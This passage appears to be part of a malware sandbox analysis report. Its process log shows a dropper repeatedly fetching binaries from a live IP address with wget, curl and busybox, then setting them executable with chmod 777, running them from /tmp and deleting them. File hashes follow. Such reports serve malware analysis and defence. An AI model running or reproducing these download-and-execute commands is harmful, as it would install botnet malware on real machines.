PID:965
-
-
/bin/rmrm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:969
-
-
/bin/chmodchmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:975
-
-
/bin/chmodchmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:981
-
-
/bin/chmodchmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:984
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:985
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:987
-
-
/bin/chmodchmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:990
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:991
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:993
-
-
/bin/chmodchmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:996
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:997
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Reads runtime system information
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:999
-
-
/bin/chmodchmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1002
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1003
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1004
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1005
-
-
/bin/chmodchmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- File and Directory Permissions Modification
PID:1006
-
-
/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Executes dropped EXE
PID:1007
-
-
/bin/rmrm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1008
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97